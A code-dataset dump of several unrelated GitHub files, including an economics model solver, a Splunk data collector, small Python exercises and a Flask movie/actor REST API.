director = parsed_response[\"Director\"]\n cast = parsed_response[\"Actors\"]\n summary = parsed_response[\"Plot\"]\n rating = parsed_response[\"Ratings\"][0][\"Value\"]\n\n #\n # INFO OUTPUTS\n #\n\n print(\"----------------------------------\")\n print(f\"TITLE: {title_name} ({release_year})\")\n print(\"----------------------------------\")\n\n print(f\"GENRE: {genre}\")\n print(f\"DIRECTOR: {director}\")\n print(f\"MAIN CAST: {cast}\")\n print(f\"SUMMARY: {summary}\")\n print(f\"IMDb RATING: {rating}\")\n print(\"----------------------------------\")\n\n\n # YouTube search \n while True:\n youtube = input(f\"Would you like to see a trailer for {title_name}? 
[Y/N] \")\n if youtube.lower() == \"y\":\n print(\"Okay, pulling up trailer now...\")\n url = youtube_search(correct_search)\n webbrowser.open(url)\n break\n elif youtube.lower() == \"n\":\n print(\"Okay, you opted not to watch the trailer.\")\n print(\"----------------------------------\")\n break\n else:\n print(\"Sorry, that was not a valid choice, please try again and enter 'Y' or 'N'.\")","repo_name":"kristyyip/movie-lookup","sub_path":"app/search_service.py","file_name":"search_service.py","file_ext":"py","file_size_in_byte":7561,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"15270101709","text":"import numpy as np\nfrom scipy.special import roots_hermite\n\nfrom soepy.shared.non_employment import calculate_non_employment_consumption_resources\nfrom soepy.shared.shared_auxiliary import calculate_log_wage\nfrom soepy.shared.shared_auxiliary import calculate_non_consumption_utility\nfrom soepy.shared.shared_auxiliary import draw_disturbances\nfrom soepy.shared.shared_constants import HOURS\nfrom soepy.solve.emaxs import construct_emax\nfrom soepy.solve.validation_solve import construct_emax_validation\n\n\ndef pyth_solve(\n states,\n covariates,\n child_state_indexes,\n model_params,\n model_spec,\n prob_child,\n prob_partner,\n is_expected,\n):\n \"\"\"Solve the model by backward induction.\n\n The solution routine performs four key operations:\n - create all nodes (state space points) of the decision tree (state space)\n that the agents might possibly reach.\n - create covariates that depend on the state space components at every\n state space point.\n - calculate the instantaneous/flow utilities for each possible choice at every\n state space point\n - calculate the continuation values for each choice at every\n state space point.\n\n Parameters\n __________\n model_params : namedtuple\n Namedtuple containing all structural, potentially free and estimable,\n parameters relevant for running a simulation.\n model_spec : namedtuple\n Namedtuple containing all fixed parameters relevant for running a simulation\n is_expected: bool\n A boolean indicator that differentiates between the human capital accumulation\n process that agents expect (is_expected = True) and that the market generates\n (is_expected = False)\n\n Returns\n _______\n states : np.ndarray\n Array with shape (num_states, 5) containing period, years of schooling,\n the lagged choice, the years of experience in part-time, and the\n years of experience in full-time employment.\n indexer : np.ndarray\n A matrix where each dimension represents a characteristic of the state space.\n Switching from one state is possible via incrementing appropriate indices by 1.\n covariates : np.ndarray\n Array with shape (num_states, number of covariates) containing all additional\n covariates, which depend only on the state space information.\n emaxs : np.ndarray\n Array with shape (num states, num_choices +1). 
First block of dimension\n        num_choices contains continuation values of the state space point.\n        Last element contains the expected maximum value function of the state space point.\n    \"\"\"\n\n    draws_emax, draw_weights_emax = get_integration_draws_and_weights(\n        model_spec, model_params\n    )\n\n    non_consumption_utilities = calculate_non_consumption_utility(\n        model_params.theta_p,\n        model_params.theta_f,\n        model_params.no_kids_f,\n        model_params.no_kids_p,\n        model_params.yes_kids_f,\n        model_params.yes_kids_p,\n        model_params.child_0_2_f,\n        model_params.child_0_2_p,\n        model_params.child_3_5_f,\n        model_params.child_3_5_p,\n        model_params.child_6_10_f,\n        model_params.child_6_10_p,\n        states,\n        covariates[:, 0],\n        np.array([0, 1, 2], dtype=float),\n    )\n\n    log_wage_systematic = calculate_log_wage(\n        model_params, states, is_expected\n    ) + np.log(model_spec.elasticity_scale)\n\n    tax_splitting = model_spec.tax_splitting\n\n    non_employment_consumption_resources = (\n        calculate_non_employment_consumption_resources(\n            model_spec.ssc_deductions,\n            model_spec.tax_params,\n            model_spec,\n            states,\n            log_wage_systematic,\n            covariates[:, 1],\n            covariates[:, 3],\n            tax_splitting,\n        )\n    )\n\n    index_child_care_costs = np.where(covariates[:, 0] > 2, 0, covariates[:, 0]).astype(\n        int\n    )\n\n    # Solve the model in a backward induction procedure.\n    # The error term of the continuation values is integrated out\n    # numerically, either by Monte Carlo or by Gauss-Hermite quadrature.\n    emaxs = pyth_backward_induction(\n        model_spec,\n        tax_splitting,\n        model_params.mu,\n        model_params.delta,\n        states,\n        child_state_indexes,\n        log_wage_systematic,\n        non_consumption_utilities,\n        draws_emax,\n        draw_weights_emax,\n        covariates,\n        index_child_care_costs,\n        prob_child,\n        prob_partner,\n        non_employment_consumption_resources,\n    )\n\n    # Return function output\n    return (\n        non_consumption_utilities,\n        emaxs,\n    )\n\n\ndef get_integration_draws_and_weights(model_spec, model_params):\n    if model_spec.integration_method == \"quadrature\":\n        # Draw standard points and corresponding weights\n        standard_draws, draw_weights_emax = roots_hermite(model_spec.num_draws_emax)\n        # Rescale draws and weights\n        draws_emax = standard_draws * np.sqrt(2) * model_params.shock_sd\n        draw_weights_emax *= 1 / np.sqrt(np.pi)\n    elif model_spec.integration_method == \"monte_carlo\":\n        draws_emax = draw_disturbances(\n            model_spec.seed_emax, 1, model_spec.num_draws_emax, model_params\n        )[0]\n        draw_weights_emax = (\n            np.ones(model_spec.num_draws_emax) / model_spec.num_draws_emax\n        )\n    else:\n        raise ValueError(\n            f\"Integration method {model_spec.integration_method} not specified.\"\n        )\n\n    return draws_emax, draw_weights_emax\n\n\n# @numba.njit\ndef pyth_backward_induction(\n    model_spec,\n    tax_splitting,\n    mu,\n    delta,\n    states,\n    child_state_indexes,\n    log_wage_systematic,\n    non_consumption_utilities,\n    draws,\n    draw_weights,\n    covariates,\n    index_child_care_costs,\n    prob_child,\n    prob_partner,\n    non_employment_consumption_resources,\n):\n    \"\"\"Get expected maximum value function at every state space point.\n    Backward induction is performed all at once for all states in a given period.\n    The function loops through each period. 
The included construct_emax function\n implicitly loops through all states in the period currently reached by the\n parent loop.\n\n Parameters\n ----------\n model_spec : namedtuple\n Contains all fixed parameters of the model including information on dimensions\n such as number of periods, agents, random draws, etc.\n states : np.ndarray\n Array with shape (num_states, 5) containing period, years of schooling,\n the lagged choice, the years of experience in part-time, and the\n years of experience in full-time employment.\n indexer : np.ndarray\n Array where each dimension represents a componenet of the state space.\n :data:`states[k]` returns the values of the state space components\n at state :data:`k`. Indexing :data:`indexer` by the same state space\n component values returns :data:`k`.\n log_wage_systematic : np.array\n One dimensional array with length num_states containing the part of the wages\n at the respective state space point that do not depend on the agent's choice,\n nor on the random shock.\n non_consumption_utilities : np.ndarray\n Array of dimension (num_states, num_choices) containing the utility\n contribution of non-pecuniary factors.\n\n Returns\n -------\n emaxs : np.ndarray\n An array of dimension (num_states, num choices + 1). The object's rows contain\n the continuation values of each choice at the specific state space points\n as its first elements. The last row element corresponds to the maximum\n expected value function of the state.\n \"\"\"\n dummy_array = np.zeros(4) # Need this array to define output for construct_emaxs\n\n emaxs = np.zeros((states.shape[0], non_consumption_utilities.shape[1] + 1))\n\n hours = np.array(HOURS)\n deductions_spec = model_spec.ssc_deductions\n tax_params = model_spec.tax_params\n child_care_costs = model_spec.child_care_costs\n\n erziehungsgeld_inc_single = model_spec.erziehungsgeld_income_threshold_single\n erziehungsgeld_inc_married = model_spec.erziehungsgeld_income_threshold_married\n erziehungsgeld = model_spec.erziehungsgeld\n\n num_periods = model_spec.num_periods\n\n # Loop backwards over all periods\n for period in np.arange(num_periods - 1, -1, -1, dtype=int):\n state_period_index = np.where(states[:, 0] == period)[0]\n\n # Extract period information\n # States\n states_period = states[state_period_index]\n\n # Probability that a child arrives\n prob_child_period = prob_child[period][states_period[:, 1]]\n\n # Probability of partner states.\n prob_partner_period = prob_partner[period][\n states_period[:, 1], states_period[:, 7]\n ]\n\n # Period rewards\n log_wage_systematic_period = log_wage_systematic[state_period_index]\n non_consumption_utilities_period = non_consumption_utilities[state_period_index]\n non_employment_consumption_resources_period = (\n non_employment_consumption_resources[state_period_index]\n )\n\n # Corresponding equivalence scale for period states\n covariates_state = covariates[state_period_index]\n male_wage_period = covariates_state[:, 1]\n equivalence_scale_period = covariates_state[:, 2]\n child_benefits_period = covariates_state[:, 3]\n\n index_child_care_costs_period = index_child_care_costs[state_period_index]\n\n # Continuation value calculation not performed for last period\n # since continuation values are known to be zero\n if period == num_periods - 1:\n emaxs_child_states = np.zeros(\n shape=(states_period.shape[0], 3, 2, 2), dtype=float\n )\n else:\n child_states_ind_period = child_state_indexes[state_period_index]\n emaxs_child_states = emaxs[:, 3][child_states_ind_period]\n\n 
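# Sketch of the recursion below: for every state reached in this period, the\n        # emax routine integrates the wage shock out with the draws and weights built\n        # above and averages over the child-arrival and partner-transition\n        # probabilities, i.e. roughly\n        #   emax(s) = E[max_choice flow_utility(choice, s) + delta * emax(s')].\n        # The branch that follows only selects which parental leave benefit rule\n        # (Elterngeld vs. Erziehungsgeld) enters the budget constraint.\n        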
if model_spec.parental_leave_regime == \"elterngeld\":\n # Calculate emax for current period reached by the loop\n emaxs_period = construct_emax(\n delta,\n log_wage_systematic_period,\n non_consumption_utilities_period,\n draws,\n draw_weights,\n emaxs_child_states,\n prob_child_period,\n prob_partner_period,\n hours,\n mu,\n non_employment_consumption_resources_period,\n deductions_spec,\n tax_params,\n child_care_costs,\n index_child_care_costs_period,\n male_wage_period,\n child_benefits_period,\n equivalence_scale_period,\n tax_splitting,\n dummy_array,\n )\n elif model_spec.parental_leave_regime == \"erziehungsgeld\":\n\n baby_child_period = (states_period[:, 6] == 0) | (states_period[:, 6] == 1)\n # Calculate emax for current period reached by the loop\n emaxs_period = construct_emax_validation(\n delta,\n baby_child_period,\n log_wage_systematic_period,\n non_consumption_utilities_period,\n draws,\n draw_weights,\n emaxs_child_states,\n prob_child_period,\n prob_partner_period,\n hours,\n mu,\n non_employment_consumption_resources_period,\n deductions_spec,\n tax_params,\n child_care_costs,\n index_child_care_costs_period,\n male_wage_period,\n child_benefits_period,\n equivalence_scale_period,\n erziehungsgeld_inc_single,\n erziehungsgeld_inc_married,\n erziehungsgeld,\n tax_splitting,\n dummy_array,\n )\n\n else:\n raise ValueError(\n f\"Parental leave regime {model_spec.parental_leave_regime} not specified.\"\n )\n\n emaxs[state_period_index] = emaxs_period\n\n return emaxs\n","repo_name":"OpenSourceEconomics/soepy","sub_path":"soepy/solve/solve_python.py","file_name":"solve_python.py","file_ext":"py","file_size_in_byte":12216,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"78"} +{"seq_id":"23969462181","text":"from __future__ import absolute_import\nfrom builtins import object\nimport time\nimport threading\nfrom . 
import ta_consts as c\nimport splunktaucclib.common.log as stulog\nimport splunktalib.common.util as scu\nfrom collections import namedtuple\n\nevt_fmt = (\n \"{0}\"\n \"\"\n \"\"\n \"\"\n \"{4}\"\n \"\"\n)\n\nunbroken_evt_fmt = (\n \"\"\n ''\n \"{0}\"\n \"\"\n \"\"\n \"\"\n \"{4}\"\n \"\"\n \"{6}\"\n \"\"\n \"\"\n)\n\nevent_tuple = namedtuple(\n \"Event\",\n [\n \"host\",\n \"source\",\n \"sourcetype\",\n \"time\",\n \"index\",\n \"raw_data\",\n \"is_unbroken\",\n \"is_done\",\n ],\n)\n\n\nclass TADataCollector(object):\n def __init__(\n self,\n tconfig,\n meta_config,\n task_config,\n checkpoint_manager_cls,\n data_client_cls,\n data_loader,\n ):\n self._lock = threading.Lock()\n self._ta_config = tconfig\n self._meta_config = meta_config\n self._task_config = task_config\n self._stopped = True\n self._p = self._get_logger_prefix()\n self._checkpoint_manager = checkpoint_manager_cls(meta_config, task_config)\n self.data_client_cls = data_client_cls\n self._data_loader = data_loader\n self._client = None\n\n def get_meta_configs(self):\n return self._meta_config\n\n def get_task_config(self):\n return self._task_config\n\n def get_interval(self):\n return self._task_config[c.interval]\n\n def _get_logger_prefix(self):\n pairs = ['{}=\"{}\"'.format(c.stanza_name, self._task_config[c.stanza_name])]\n for key in self._task_config[c.divide_key]:\n pairs.append('{}=\"{}\"'.format(key, self._task_config[key]))\n return \"[{}]\".format(\" \".join(pairs))\n\n def stop(self):\n self._stopped = True\n if self._client:\n self._client.stop()\n\n def __call__(self):\n self.index_data()\n\n def _build_event(self, events):\n if not events:\n return None\n if not isinstance(events, list):\n events = [events]\n evts = []\n for event in events:\n assert event.raw_data, \"the raw data of events is empty\"\n if event.is_unbroken:\n evt = unbroken_evt_fmt.format(\n event.host or \"\",\n event.source or \"\",\n event.sourcetype or \"\",\n event.time or \"\",\n event.index or \"\",\n scu.escape_cdata(event.raw_data),\n \"\" if event.is_done else \"\",\n )\n else:\n evt = evt_fmt.format(\n event.host or \"\",\n event.source or \"\",\n event.sourcetype or \"\",\n event.time or \"\",\n event.index or \"\",\n scu.escape_cdata(event.raw_data),\n )\n evts.append(evt)\n return evts\n\n def _get_ckpt(self):\n return self._checkpoint_manager.get_ckpt()\n\n def _get_ckpt_key(self):\n return self._checkpoint_manager.get_ckpt_key()\n\n def _update_ckpt(self, ckpt):\n return self._checkpoint_manager.update_ckpt(ckpt)\n\n def _create_data_client(self):\n ckpt = self._get_ckpt()\n data_client = self.data_client_cls(\n self._ta_config.get_all_conf_contents(),\n self._meta_config,\n self._task_config,\n ckpt,\n self._checkpoint_manager,\n )\n\n stulog.logger.debug(\"{} Set {}={} \".format(self._p, c.ckpt_dict, ckpt))\n return data_client\n\n def index_data(self):\n if self._lock.locked():\n stulog.logger.debug(\n \"Last round of stanza={} is not done yet\".format(\n self._task_config[c.stanza_name]\n )\n )\n return\n with self._lock:\n self._stopped = False\n checkpoint_key = self._get_ckpt_key()\n stulog.logger.info(\n \"{} Start indexing data for checkpoint_key={\"\n \"}\".format(self._p, checkpoint_key)\n )\n try:\n\n self._do_safe_index()\n except Exception:\n stulog.logger.exception(\"{} Failed to index data\".format(self._p))\n stulog.logger.info(\n \"{} End of indexing data for checkpoint_key={}\".format(\n self._p, checkpoint_key\n )\n )\n\n def _write_events(self, ckpt, events):\n evts = self._build_event(events)\n if 
evts:\n if not self._data_loader.write_events(evts):\n stulog.logger.info(\n \"{} the event queue is closed and the \"\n \"received data will be discarded\".format(self._p)\n )\n return False\n if ckpt is None:\n return True\n for i in range(3):\n try:\n self._update_ckpt(ckpt)\n except Exception:\n stulog.logger.exception(\n \"{} Failed to update ckpt {} to {}\".format(\n self._p, self._get_ckpt_key(), ckpt\n )\n )\n time.sleep(2)\n continue\n else:\n return True\n # write checkpoint fail\n self.stop()\n return False\n\n def _do_safe_index(self):\n self._client = self._create_data_client()\n while not self._stopped:\n try:\n events, ckpt = self._client.get()\n if not events and not ckpt:\n continue\n else:\n if not self._write_events(ckpt, events):\n break\n except StopIteration:\n stulog.logger.debug(\"{} Finished this round\".format(self._p))\n break\n except Exception:\n stulog.logger.exception(\"{} Failed to get msg\".format(self._p))\n break\n self.stop()\n try:\n self._client.get()\n except StopIteration:\n stulog.logger.debug(\"{} Invoke client.get() after stop \".format(self._p))\n","repo_name":"LetMeR00t/TA-thehive-cortex","sub_path":"TA-thehive-cortex/bin/ta_thehive_cortex/aob_py3/splunktaucclib/data_collection/ta_data_collector.py","file_name":"ta_data_collector.py","file_ext":"py","file_size_in_byte":6588,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"78"} +{"seq_id":"24194061112","text":"from IO import *\n\ndef _DIF():\n return 'DailyDIF'\n\ndef _DIF_AVG(length):\n return 'DailyDIF_AVG'+str(length)\n\n\ndef calc_dif(data) :\n print('calc dif, tag is [' + _DIF() + ']')\n\n for i in range(1, len(data)):\n data[i][_DIF()] = data[i][PRICE] / data[i-1][PRICE]\n\n\ndef calc_average(data, length) :\n print('calc dif_average, tag is [' + _DIF_AVG(length) + ']')\n\n if(length *2 > len(data)):\n print('length(' + str(length) + ') is too long')\n return\n\n sum = 0\n for i in range(1, length*2+1):\n sum += data[i][_DIF()]\n\n for i in range(length+1, len(data)-length):\n data[i][_DIF_AVG(length)] = sum / length / 2\n\n sum -= data[i-length][_DIF()]\n sum += data[i+length][_DIF()]\n\ndef plot_average(data, length, title):\n date = []\n price = []\n\n for row in data:\n if(_DIF_AVG(length) in row):\n date.append(row[DATE])\n price.append(row[_DIF_AVG(length)])\n \n ax.plot(date, price, label=title)\n\ndef hist_dif(data, expected, variance, title):\n date = []\n price = []\n\n for row in data:\n if(_DIF() in row):\n date.append(row[DATE])\n price.append(row[_DIF()])\n \n ax.hist(price, label=title, bins=200, density=True)\n\n x_axis = np.arange(.9,1.1, 0.001)\n ax.plot(x_axis, norm.pdf(x_axis,expected, variance ** 0.5))\n\ndef plot_dif(data, title):\n date = []\n price = []\n\n for row in data:\n if(_DIF() in row):\n date.append(row[DATE])\n price.append(row[_DIF()])\n \n ax.plot(date, price, '.' 
, label=title)\n","repo_name":"pozdnyako/MOEX","sub_path":"difference.py","file_name":"difference.py","file_ext":"py","file_size_in_byte":1597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
{"seq_id":"4846583051","text":"import constants\nfrom app import app\nfrom flask import render_template, request\n\n\n@app.route('/', methods=['GET'])\ndef index():\n    name = request.values.get('username')\n    if not name:\n        name = ''\n    gender = request.values.get('gender')\n    program_id = request.values.get('program')\n    subject_id = request.values.getlist('subject[]')\n    # build the list of subjects selected by the user\n    subjects_select = [constants.subjects[int(i)] for i in subject_id]\n    # build the list of olympiads selected by the user\n    olympiad_id = request.values.getlist('olympiad[]')\n    olympiads_select = [constants.olympiads[int(i)] for i in olympiad_id]\n    if program_id:\n        program = constants.programs[int(program_id)]\n    else:\n        program = constants.programs[0]\n\n    html = render_template(\n        'index.html',\n        program_list=constants.programs,\n        subject_list=constants.subjects,\n        olympiad_list=constants.olympiads,\n        len=len,\n        name=name,\n        gender=gender,\n        program=program,\n        subjects_select=subjects_select,\n        olympiads_select=olympiads_select\n    )\n\n    if program_id:\n        html += render_template(\n            'hello.html',\n            program_list=constants.programs,\n            subject_list=constants.subjects,\n            olympiad_list=constants.olympiads,\n            len=len,\n            name=name,\n            gender=gender,\n            program=program,\n            subjects_select=subjects_select,\n            olympiads_select=olympiads_select\n        )\n    return html\n","repo_name":"dendudko/NetworkTech7","sub_path":"Lab6__Flask/controllers/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
{"seq_id":"22736718571","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Apr 15 21:54:31 2022\r\n\r\n@author: Hp\r\n\"\"\"\r\n\r\nfrom random import *\r\n\r\nItems=[\"cake\", \"coffee\", \"iced coffee\"]\r\nprices=[0.550, 0.300, 0.250]\r\nquan=[]\r\nfor i in range(len(Items)):\r\n    num=randint(1,50)\r\n    quan.append(num)\r\n    \r\nrev=[]\r\nco=0\r\nfor i in range(len(Items)):\r\n    result=prices[i]*quan[i]\r\n    rev.append(result)\r\n    co+=1\r\n    \r\nprint(\"%-12s %-8s %-9s %-6s\" %(\"Item\", \"Price\", \"Quantity\", \"Revenue\"))\r\nprint(\"*\"*40)\r\nfor i in range(len(Items)):\r\n    print(\"%-12s %-8.3f %-9d %-6.3f\" %(Items[i],prices[i] ,quan[i] ,rev[i] ))\r\nprint(\"*\"*40) \r\n\r\ntotal=0 \r\nfor element in rev :\r\n    total= total+element\r\n\r\nave=total/co\r\n    \r\nprint(\"Total revenue= \", total ,\"OMR\")\r\nprint('The average= ', ave) \r\n\r\nfor i in range(len(rev)):\r\n    if rev[i]< ave:\r\n        print(\"%-12s\"%Items[i], \"\", rev[i])\r\n        \r\n        \r\n        \r\n        \r\n        \r\n        \r\n        \r\n        \r\n        \r\n        \r\n        \r\n        \r\n        \r\n        \r\n        \r\n        \r\n        \r\n        \r\n    ","repo_name":"AthirAlAbri/Python","sub_path":"lab10 practice.py","file_name":"lab10 practice.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
{"seq_id":"17271693186","text":"\"Roman Numerals Helper\"\n\n\nclass RomanNumerals(object):\n    @classmethod\n    def to_roman(cls, num):\n        m = {1000: \"M\",\n             900: \"CM\",\n             500: \"D\",\n             400: \"CD\",\n             100: \"C\",\n             90: \"XC\",\n             50: \"L\",\n             40: \"XL\",\n             10: \"X\",\n             9: \"IX\",\n             5: \"V\",\n             4: \"IV\",\n             1: \"I\"}\n        if num in m.keys():\n            return m[num]\n        for i in sorted(m.keys(), 
reverse=True):\n            if num >= i:\n                return m[i] + RomanNumerals.to_roman(num - i)\n        return \"\"\n\n    @classmethod\n    def from_roman(cls, s):\n        m = {'M': 1000, 'D': 500, 'C': 100, 'L': 50, 'X': 10, 'V': 5, 'I': 1}\n        s = s.upper()\n        stack = [0]\n        # reversed\n        for c in s[::-1]:\n            if m[c] >= stack[-1]:\n                stack.append(m[c])\n            else:\n                v = stack.pop()\n                stack.append(v - m[c])\n        return sum(stack)\n\nprint(\nRomanNumerals.to_roman(4), # should return 'IV'\nRomanNumerals.from_roman('M') # should return 1000\n)","repo_name":"shubham25namdeo/Leetcode","sub_path":"codewars/Roman Numerals Helper.py","file_name":"Roman Numerals Helper.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"78"}
{"seq_id":"34047891497","text":"\"\"\"Tabular representation\"\"\"\n\nfrom rlpy.Representations.Representation import Representation\nimport numpy as np\nfrom copy import deepcopy\n\n__copyright__ = \"Copyright 2013, RLPy http://acl.mit.edu/RLPy\"\n__credits__ = [\"Alborz Geramifard\", \"Robert H. Klein\", \"Christoph Dann\",\n               \"William Dabney\", \"Jonathan P. How\"]\n__license__ = \"BSD 3-Clause\"\n__author__ = \"Imanol Arrieta Ibarra\"\n\n\nclass TabularPosterior(Representation):\n    \"\"\"\n    Tabular representation that assigns a binary feature function f_{d}() \n    to each possible discrete state *d* in the domain. (For bounded continuous\n    dimensions of s, discretize.)\n    f_{d}(s) = 1 when d=s, 0 elsewhere. (ie, the vector of feature functions\n    evaluated at *s* will have all zero elements except one).\n    NOTE that this representation does not support unbounded dimensions\n    \n    Additionally, this representation has two types of weights. \n\n    \"\"\"\n    observed = None\n    observed_rewards = None\n    observed_transitions = None\n\n    def __init__(self, domain, discretization=20):\n        # Already performed in call to superclass\n        self.setBinsPerDimension(domain, discretization)\n        self.features_num = int(np.prod(self.bins_per_dim))\n        super(TabularPosterior, self).__init__(domain, discretization)\n        self.observed_rewards = {}\n        self.observed = np.zeros((self.features_num,self.actions_num))\n        self.observed_transitions = np.zeros((self.features_num,self.actions_num,self.agg_states_num))\n\n    def phi_nonTerminal(self, s):\n        hashVal = self.hashState(s)\n        F_s = np.zeros(self.agg_states_num, bool)\n        F_s[hashVal] = 1\n        return F_s\n\n    def featureType(self):\n        return bool\n    \n    def location(self,s,a,ns):\n        hashVal =self.hashState(s)\n        hashVal_prime = self.hashState(ns)\n        i,j = hashVal, hashVal_prime\n        return i,j\n    \n","repo_name":"imanolarrieta/angrybirds","sub_path":"RL/Final Project/Tests/TabularPosterior.py","file_name":"TabularPosterior.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","stars":65,"dataset":"github-code","pt":"78"}
{"seq_id":"9137044346","text":"import os\n\nfrom flask import Flask, request, abort, jsonify\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_migrate import Migrate\nfrom flask_cors import CORS, cross_origin\n\nfrom config import TestConfig, Config\nfrom models import setup_db, Movies, Actors, Category, MoviesCategories, MoviesActors, Agents\nfrom auth import requires_auth\n\ndb = SQLAlchemy()\ncors = CORS()\nmigrate = Migrate()\n\n\ndef paginate(request, selection):\n    \"\"\"\n    Function that handles pagination\n    :param request: request passed used to get the current page\n    :param selection: the object from the database to paginate\n    :return: the paginated object, containing a list with the 
formatted objects\n \"\"\"\n page = request.args.get('page', 1, type=int)\n start = (page - 1) * Config.PAGINATION\n end = start + Config.PAGINATION\n\n obj_list = [obj.format() for obj in selection]\n pagination = obj_list[start:end]\n\n return pagination\n\n\ndef create_app(config_file=Config):\n \"\"\"\n Used to create the flask app\n :param config_file: a config file, which you can setup in the config.py file - defaults to Config\n :return: returns the flask app\n \"\"\"\n app = Flask(__name__)\n\n app.config.from_object(config_file)\n\n db.init_app(app=app)\n # cors.init_app(app, resources={r\"*\": {\"origins\": \"*\"}})\n cors.init_app(app)\n migrate.init_app(app=app, db=db)\n\n with app.app_context():\n setup_db(app)\n\n # Just do CORS stuff here before request\n # @app.after_request\n # def after_request(response):\n # \"\"\"\n # Function that handles CORS\n # :param response: response header\n # :return: returns the response with CORS headers\n # \"\"\"\n # response.headers.add('Access-Control-Allow-Headers', 'Content-Type,Authorization,true')\n # response.headers.add('Access-Control-Allow-Methods', 'GET,PUT,POST,DELETE,OPTIONS')\n # response.headers.add('Access-Control-Allow-Credentials', 'true')\n #\n # return response\n\n @app.route('/')\n def index():\n return \"
<h1>Capstone API</h1>
\"\n\n    @app.route('/movies', methods=['GET'])\n    @cross_origin()\n    @requires_auth('get:movies')\n    def get_movies(payload):\n        \"\"\"\n        Get the Movies here and paginate them\n        :param payload:\n        :return: a json object containing the paginated movies and the total movies\n        \"\"\"\n        movies = Movies.query.order_by(Movies.id).all()\n\n        if len(movies) == 0:\n            abort(404, 'Sorry, we could not find any Movies to display.')\n\n        return jsonify({\n            'movies': paginate(request, movies),\n            'total_movies': len(movies)\n        })\n\n    @app.route('/agents', methods=['GET'])\n    @cross_origin()\n    @requires_auth('get:agents')\n    def get_agents(payload):\n        \"\"\"\n        GET method to fetch all the agents from the database\n        :return: json object containing the paginated agents, and total of agents\n        \"\"\"\n        agents = Agents.query.order_by(Agents.id).all()\n\n        if len(agents) == 0:\n            abort(404, 'Sorry, we could not find any Agents.')\n\n        return jsonify({\n            'agents': paginate(request, agents),\n            'total_agents': len(agents)\n        })\n\n    @app.route('/categories', methods=['GET'])\n    @cross_origin()\n    @requires_auth('get:categories')\n    def get_categories(payload):\n        \"\"\"\n        GET method to fetch the categories and paginate them\n        :return: json object containing all categories and total categories\n        \"\"\"\n        categories = Category.query.order_by(Category.id).all()\n\n        if len(categories) == 0:\n            abort(404, 'Sorry, we could not find any Categories.')\n\n        return jsonify({\n            'categories': paginate(request, categories),\n            'total_categories': len(categories)\n        })\n\n    @app.route('/actors', methods=['GET'])\n    @cross_origin()\n    @requires_auth('get:actors')\n    def get_actors(payload):\n        \"\"\"\n        GET method to fetch all the actors\n        :return: json object containing the paginated actors and total of actors\n        \"\"\"\n        actors = Actors.query.order_by(Actors.id).all()\n\n        if len(actors) == 0:\n            abort(404, 'Sorry, we could not find any Actors to display.')\n\n        return jsonify({\n            'actors': paginate(request, actors),\n            'total_actors': len(actors)\n        })\n\n    @app.route('/agent/<int:agent_id>', methods=['GET'])\n    @cross_origin()\n    @requires_auth('patch:agents')\n    def get_agent(payload, agent_id):\n        \"\"\"\n        GET method to fetch the agent based on agent_id passed\n        :param agent_id: the id of the current agent to fetch from the database\n        :return: json object containing the agent in a proper format\n        \"\"\"\n        agent = Agents.query.filter_by(id=agent_id).first_or_404()\n\n        if agent is None:\n            abort(404, 'Sorry, we could not find any Agents to display.')\n\n        return jsonify({\n            'agent': agent.format(),\n        })\n\n    @app.route('/actor/<int:actor_id>', methods=['GET'])\n    @cross_origin()\n    @requires_auth('patch:actors')\n    def get_actor(payload, actor_id):\n        \"\"\"\n        GET method to fetch the actor based on actor_id passed\n        :param actor_id: the id of the current actor to fetch from the database\n        :return: json object containing the actor in a proper format\n        \"\"\"\n        actor = Actors.query.filter_by(id=actor_id).first_or_404()\n\n        if actor is None:\n            abort(404, 'Sorry, we could not find any Actors to display.')\n\n        return jsonify({\n            'actor': actor.format(),\n        })\n\n    @app.route('/movie/<int:movie_id>', methods=['GET'])\n    @cross_origin()\n    @requires_auth('patch:movies')\n    def get_movie(payload, movie_id):\n        \"\"\"\n        GET method to fetch the movie based on movie_id passed\n        :param movie_id: the id of the current movie to fetch from the database\n        :return: json object containing the movie in a proper format\n        \"\"\"\n        movie = Movies.query.filter_by(id=movie_id).first_or_404()\n\n        if movie is None:\n            abort(404, 'Sorry, we could 
not find any Movies to display.')\n\n        return jsonify({\n            'movie': movie.format(),\n        })\n\n    @app.route('/category/<int:category_id>', methods=['GET'])\n    @cross_origin()\n    @requires_auth('patch:categories')\n    def get_category(payload, category_id):\n        \"\"\"\n        GET method to fetch the category based on category_id passed\n        :param category_id: the id of the current category to fetch from the database\n        :return: json object containing the category\n        \"\"\"\n        category = Category.query.filter_by(id=category_id).first_or_404()\n\n        if category is None:\n            abort(404, 'Sorry, we could not find any Categories to display.')\n\n        return jsonify({\n            'category': category.format(),\n        })\n\n    @app.route('/actor', methods=['POST'])\n    @cross_origin()\n    @requires_auth('post:actors')\n    def new_actor(payload):\n        \"\"\"\n        Add an Actor here\n        :param payload:\n        :return:\n        \"\"\"\n        form = request.get_json(force=True)\n\n        if Actors.query.filter_by(name=form['name']).first() is not None:\n            abort(500, \"Actor '{}' already exists...\".format(\n                form['name']\n            ))\n\n        try:\n            new_actor = Actors(\n                name=form['name'],\n                gender=form['gender'],\n                age=form['age'],\n                joined_in=form['joined_in'],\n                agent_id=form['agent_id']\n            )\n            new_actor.insert()\n        except Exception as e:\n            print(e)\n            abort(500, e)\n\n        return jsonify({\n            'actor': [new_actor.format()]\n        })\n\n    @app.route('/agent', methods=['POST'])\n    @cross_origin()\n    @requires_auth('post:agents')\n    def new_agent(payload):\n        \"\"\"\n        Add an Agent here\n        :param payload:\n        :return:\n        \"\"\"\n        form = request.get_json(force=True)\n\n        if Agents.query.filter_by(name=form['name']).first() is not None:\n            